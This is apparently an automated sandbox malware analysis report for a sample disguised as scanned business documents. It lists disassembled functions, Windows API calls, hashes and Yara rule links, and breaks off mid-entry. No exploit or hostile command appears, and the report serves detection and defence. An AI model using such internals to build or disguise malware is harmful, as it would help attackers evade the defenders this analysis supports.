                                                      • Instruction ID: b0c6b79039b162c662eb84d93bcfe19a330295346bdd1518eb5d7f182e3dd3d4
                                                      • Opcode Fuzzy Hash: 351ecd7d4e783a412b133e2500ca6e872025d1d0c191558d6ed80db4e2929757
                                                      • Instruction Fuzzy Hash: B411AD72122509BFEF126FA48C48EEABB6DFF0C3A4F044215FA04521A0C7729C60DBA0
                                                      Function 002A3B3C Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • ___BuildCatchObject.LIBVCRUNTIME ref: 002A3B56
                                                        • Part of subcall function 002A3AA3: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 002A3AD2
                                                        • Part of subcall function 002A3AA3: ___AdjustPointer.LIBCMT ref: 002A3AED
                                                      • _UnwindNestedFrames.LIBCMT ref: 002A3B6B
                                                      • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 002A3B7C
                                                      • CallCatchBlock.LIBVCRUNTIME ref: 002A3BA4
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                      • String ID:
                                                      • API String ID: 737400349-0
                                                      • Opcode ID: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
                                                      • Instruction ID: 40769a1b0e52a115f3f79f3415afe72b9735f75b4b95c297733a64b699c524d4
                                                      • Opcode Fuzzy Hash: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
                                                      • Instruction Fuzzy Hash: BF012932110149BBDF12AE95DC42EEB7F6AEF8A758F044414FE4856121CB72E971DFA0
                                                      Function 002B3073 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,002813C6,00000000,00000000,?,002B301A,002813C6,00000000,00000000,00000000,?,002B328B,00000006,FlsSetValue), ref: 002B30A5
                                                      • GetLastError.KERNEL32(?,002B301A,002813C6,00000000,00000000,00000000,?,002B328B,00000006,FlsSetValue,00322290,FlsSetValue,00000000,00000364,?,002B2E46), ref: 002B30B1
                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,002B301A,002813C6,00000000,00000000,00000000,?,002B328B,00000006,FlsSetValue,00322290,FlsSetValue,00000000), ref: 002B30BF
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: LibraryLoad$ErrorLast
                                                      • String ID:
                                                      • API String ID: 3177248105-0
                                                      • Opcode ID: 6e63cad7b80e9d1d3a91c7330598a033bfaea71ce22ef1c387c83d8cf1359682
                                                      • Instruction ID: fcd6e83ce94cd944723b56007b954cc51d3ef3078d7ee69b914cb69012294696
                                                      • Opcode Fuzzy Hash: 6e63cad7b80e9d1d3a91c7330598a033bfaea71ce22ef1c387c83d8cf1359682
                                                      • Instruction Fuzzy Hash: 4901D436775233ABCB329E78AC449D77B9CAF09BE1F204A20F906E3140CB21D911C6E0
                                                      Function 002E7464 Relevance: 6.1, APIs: 4, Instructions: 51registryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000), ref: 002E747F
                                                      • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 002E7497
                                                      • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 002E74AC
                                                      • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 002E74CA
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: Type$Register$FileLoadModuleNameUser
                                                      • String ID:
                                                      • API String ID: 1352324309-0
                                                      • Opcode ID: 9e39aa40db6d486c5d7c9a2b7aef2b2d2547d27363f1c572e50d8d1966042a2a
                                                      • Instruction ID: 7bbb21a1cdaa5c83f0e4d0225b3b67daab7492108f3fa70f00faa963e9be1078
                                                      • Opcode Fuzzy Hash: 9e39aa40db6d486c5d7c9a2b7aef2b2d2547d27363f1c572e50d8d1966042a2a
                                                      • Instruction Fuzzy Hash: 161104B52A9354AFF3218F16DC08F937FFCEB04B00F508069A616D6091D7B0E914CB50
                                                      Function 002EB0A8 Relevance: 6.0, APIs: 4, Instructions: 50sleepCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,002EACD3,?,00008000), ref: 002EB0C4
                                                      • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,002EACD3,?,00008000), ref: 002EB0E9
                                                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,002EACD3,?,00008000), ref: 002EB0F3
                                                      • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,002EACD3,?,00008000), ref: 002EB126
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: CounterPerformanceQuerySleep
                                                      • String ID:
                                                      • API String ID: 2875609808-0
                                                      • Opcode ID: 1b4f3e97527277dd3d2ee7434a50767f1b36ab126a14309bf4c18cd878ff9e8d
                                                      • Instruction ID: 1ac3297e80c43277c062c46dd9033bd824407cc8709a1e7de5360e9112d162e1
                                                      • Opcode Fuzzy Hash: 1b4f3e97527277dd3d2ee7434a50767f1b36ab126a14309bf4c18cd878ff9e8d
                                                      • Instruction Fuzzy Hash: AC11A130CA065DE7CF02AFE5E9587EFBB78FF09320F404095D945B6141CB3055609B51
                                                      Function 002E2DA7 Relevance: 6.0, APIs: 4, Instructions: 34threadwindowtimeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 002E2DC5
                                                      • GetWindowThreadProcessId.USER32(?,00000000), ref: 002E2DD6
                                                      • GetCurrentThreadId.KERNEL32 ref: 002E2DDD
                                                      • AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 002E2DE4
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                      • String ID:
                                                      • API String ID: 2710830443-0
                                                      • Opcode ID: 68dde748ee5c5d8b7bd78e52fbee2b0bd4add1020b2c51c3c49318ee0a5cdcb7
                                                      • Instruction ID: 161edbb44acb2f4454118ae45e589dcd01eb4091dc89160e92a2462ed538428e
                                                      • Opcode Fuzzy Hash: 68dde748ee5c5d8b7bd78e52fbee2b0bd4add1020b2c51c3c49318ee0a5cdcb7
                                                      • Instruction Fuzzy Hash: 0EE092715A1224BBD7211B739C0DFEB3E6CFF4BBA1F445115F206D1080DAA4C844C6B0
                                                      Function 00318863 Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00299639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00299693
                                                        • Part of subcall function 00299639: SelectObject.GDI32(?,00000000), ref: 002996A2
                                                        • Part of subcall function 00299639: BeginPath.GDI32(?), ref: 002996B9
                                                        • Part of subcall function 00299639: SelectObject.GDI32(?,00000000), ref: 002996E2
                                                      • MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 00318887
                                                      • LineTo.GDI32(?,?,?), ref: 00318894
                                                      • EndPath.GDI32(?), ref: 003188A4
                                                      • StrokePath.GDI32(?), ref: 003188B2
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                      • String ID:
                                                      • API String ID: 1539411459-0
                                                      • Opcode ID: 88510dd38281c4ff9d2f4a2e37f5b49043ecf76b3b05beb1b1d01c26b1cb39bc
                                                      • Instruction ID: 1dc61fb469f0123d9fb817e9c60bda0b07290cc7eb1884e7b2d8bf1322792cd0
                                                      • Opcode Fuzzy Hash: 88510dd38281c4ff9d2f4a2e37f5b49043ecf76b3b05beb1b1d01c26b1cb39bc
                                                      • Instruction Fuzzy Hash: 95F03A36091258BADB135F98AC0AFCA3B5DAF0E311F048000FA11650E1C7755561CFE9
                                                      Function 002998B0 Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetSysColor.USER32(00000008), ref: 002998CC
                                                      • SetTextColor.GDI32(?,?), ref: 002998D6
                                                      • SetBkMode.GDI32(?,00000001), ref: 002998E9
                                                      • GetStockObject.GDI32(00000005), ref: 002998F1
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: Color$ModeObjectStockText
                                                      • String ID:
                                                      • API String ID: 4037423528-0
                                                      • Opcode ID: aa8bc498d96ff9290b48f9999aef0e785fb1d7da0aa2b843d3b955483f1636d7
                                                      • Instruction ID: 5cd1e064ae4ca5672120d1a074d56f98bbe0e6292f758eb3d2420d8f12bffaba
                                                      • Opcode Fuzzy Hash: aa8bc498d96ff9290b48f9999aef0e785fb1d7da0aa2b843d3b955483f1636d7
                                                      • Instruction Fuzzy Hash: 68E065312D4240BADB225F74BC09BD83F25AB16335F14D22AF6F5540E1C37146509B11
                                                      Function 002E162B Relevance: 6.0, APIs: 4, Instructions: 22threadCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetCurrentThread.KERNEL32 ref: 002E1634
                                                      • OpenThreadToken.ADVAPI32(00000000,?,?,?,002E11D9), ref: 002E163B
                                                      • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,002E11D9), ref: 002E1648
                                                      • OpenProcessToken.ADVAPI32(00000000,?,?,?,002E11D9), ref: 002E164F
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: CurrentOpenProcessThreadToken
                                                      • String ID:
                                                      • API String ID: 3974789173-0
                                                      • Opcode ID: 01698c04f52014dbaa5b15f92a1d5b2931223398ca1376989e1e55de807a0c45
                                                      • Instruction ID: 0f953ed4e20a47c39ef2061ffbf9ba39a5724e43d3aeabb381f9c430833b5ae2
                                                      • Opcode Fuzzy Hash: 01698c04f52014dbaa5b15f92a1d5b2931223398ca1376989e1e55de807a0c45
                                                      • Instruction Fuzzy Hash: CDE08635691211DBD7201FA19D0DBC63B7CBF4C791F14DC18F345C9080D6348551C750
                                                      Function 002DD858 Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetDesktopWindow.USER32 ref: 002DD858
                                                      • GetDC.USER32(00000000), ref: 002DD862
                                                      • GetDeviceCaps.GDI32(00000000,0000000C), ref: 002DD882
                                                      • ReleaseDC.USER32(?), ref: 002DD8A3
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: CapsDesktopDeviceReleaseWindow
                                                      • String ID:
                                                      • API String ID: 2889604237-0
                                                      • Opcode ID: 201faa48b4eaebd7281540075ad1dbf47050ecc22e4a32a412b219bafdf97ad1
                                                      • Instruction ID: cc7a852b6a98f2c3bf7cd6d3c2642eb3f0cd18fffae334f40f3424ccad4c2e08
                                                      • Opcode Fuzzy Hash: 201faa48b4eaebd7281540075ad1dbf47050ecc22e4a32a412b219bafdf97ad1
                                                      • Instruction Fuzzy Hash: 94E01AB4860204EFCF42AFA0D8086ADBBB9FB0C310F24E009E80AE7250C7788911EF50
                                                      Function 002DD86C Relevance: 6.0, APIs: 4, Instructions: 18COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetDesktopWindow.USER32 ref: 002DD86C
                                                      • GetDC.USER32(00000000), ref: 002DD876
                                                      • GetDeviceCaps.GDI32(00000000,0000000C), ref: 002DD882
                                                      • ReleaseDC.USER32(?), ref: 002DD8A3
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: CapsDesktopDeviceReleaseWindow
                                                      • String ID:
                                                      • API String ID: 2889604237-0
                                                      • Opcode ID: 15c17484f8f89937127f849cb46a82a5c0e04200196caeaae3803d292ab839f9
                                                      • Instruction ID: 2f207db52763d9f49f7c940ed5b37aa4eada4740e146241365a53e00acf55cd3
                                                      • Opcode Fuzzy Hash: 15c17484f8f89937127f849cb46a82a5c0e04200196caeaae3803d292ab839f9
                                                      • Instruction Fuzzy Hash: 34E09A75C60204DFCF52AFA0D8086ADBBB9BB1C311F14A449E94AE7250C7785911EF50
                                                      Function 002F4D87 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 230shareCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00287620: _wcslen.LIBCMT ref: 00287625
                                                      • WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 002F4ED4
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: Connection_wcslen
                                                      • String ID: *$LPT
                                                      • API String ID: 1725874428-3443410124
                                                      • Opcode ID: 240de57e281dc54f02c82355ed9f5cda1ca03d52b6b7319b9c397091999738af
                                                      • Instruction ID: 81d39dc8af231a16987448562039b734ab6fb6135ae25225e2fdea76559f9a72
                                                      • Opcode Fuzzy Hash: 240de57e281dc54f02c82355ed9f5cda1ca03d52b6b7319b9c397091999738af
                                                      • Instruction Fuzzy Hash: 87918F74A102099FCB14EF54C484EBABBF1BF48344F1480A9E90A9F7A2D775ED95CB90
                                                      Function 002AE27D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • __startOneArgErrorHandling.LIBCMT ref: 002AE30D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: ErrorHandling__start
                                                      • String ID: pow
                                                      • API String ID: 3213639722-2276729525
                                                      • Opcode ID: c6f849a21aa571f3611586fd467d85a140a3232a90dd0919811722a3da108e12
                                                      • Instruction ID: 5284eb911adb0b12e22c46ad469f629c7ea9c3cddb82141822b7b10ffb58ef9b
                                                      • Opcode Fuzzy Hash: c6f849a21aa571f3611586fd467d85a140a3232a90dd0919811722a3da108e12
                                                      • Instruction Fuzzy Hash: BB512A61A3C203A7CF167F14CD013BA3BA89F917C0F25499DE495422A9EF348CB79A46
                                                      Function 00307771 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CharUpperBuffW.USER32(002D569E,00000000,?,0031CC08,?,00000000,00000000), ref: 003078DD
                                                        • Part of subcall function 00286B57: _wcslen.LIBCMT ref: 00286B6A
                                                      • CharUpperBuffW.USER32(002D569E,00000000,?,0031CC08,00000000,?,00000000,00000000), ref: 0030783B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: BuffCharUpper$_wcslen
                                                      • String ID: <s4
                                                      • API String ID: 3544283678-4153809766
                                                      • Opcode ID: 860c7119366ee9898e024ff2ec3537095cd27dbf6224f06785209e1fe1996919
                                                      • Instruction ID: cf37464b5bfcf70caa42f9693a060d2c4a24b25540709993589458db2c81c8f4
                                                      • Opcode Fuzzy Hash: 860c7119366ee9898e024ff2ec3537095cd27dbf6224f06785209e1fe1996919
                                                      • Instruction Fuzzy Hash: 73617D3A926119EBCF06FBA4CCA1DFDB378BF14700B444125E502B70D1EF246A55CBA0
                                                      Function 0029E187 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: #
                                                      • API String ID: 0-1885708031
                                                      • Opcode ID: c5810afffbb32bb3125118870452c25758f292645ee41a7e8a4ce37f07398f7f
                                                      • Instruction ID: ecf9dcedfda360d5d599c398c82c33bdbe107e2fc9c6371b2b0b68093457d3e6
                                                      • Opcode Fuzzy Hash: c5810afffbb32bb3125118870452c25758f292645ee41a7e8a4ce37f07398f7f
                                                      • Instruction Fuzzy Hash: DA510175924247DFEF15EF28C4816FABBA8EF29310F254056EC919F2D0D6309D62CBA0
                                                      Function 0029F291 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • Sleep.KERNEL32(00000000), ref: 0029F2A2
                                                      • GlobalMemoryStatusEx.KERNEL32(?), ref: 0029F2BB
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: GlobalMemorySleepStatus
                                                      • String ID: @
                                                      • API String ID: 2783356886-2766056989
                                                      • Opcode ID: 339079f61b52ee1910eab697a275704724ba7ac683da8dade6b33a1cf238ac56
                                                      • Instruction ID: 3cd63e09f668766455e89a8202b5ff5d67a307974234afe77f6144ab1c8fa39f
                                                      • Opcode Fuzzy Hash: 339079f61b52ee1910eab697a275704724ba7ac683da8dade6b33a1cf238ac56
                                                      • Instruction Fuzzy Hash: 665138714197449BE320AF10E886BABBBF8FF94304F91885DF199511A5EB308539CB66
                                                      Function 00305745 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 125COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CharUpperBuffW.USER32(?,?,?,00000003,?,?), ref: 003057E0
                                                      • _wcslen.LIBCMT ref: 003057EC
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
